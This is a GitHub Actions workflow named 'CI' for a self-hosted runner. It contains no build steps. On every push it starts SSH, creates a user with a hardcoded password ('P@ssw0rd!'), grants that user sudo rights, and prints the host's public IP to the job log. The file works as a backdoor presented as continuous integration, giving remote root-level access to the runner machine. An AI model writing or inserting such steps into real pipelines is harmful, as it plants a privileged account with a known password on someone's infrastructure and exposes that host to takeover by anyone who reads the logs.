name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: self-hosted

    steps:
    - name: Start SSH service
      run: sudo service ssh start
    - name: Create SSH user
      run: |
        sudo useradd -m github_runner
        echo 'github_runner:P@ssw0rd!' | sudo chpasswd
        sudo usermod -aG sudo github_runner
    - name: Show public IP
      run: curl ifconfig.me
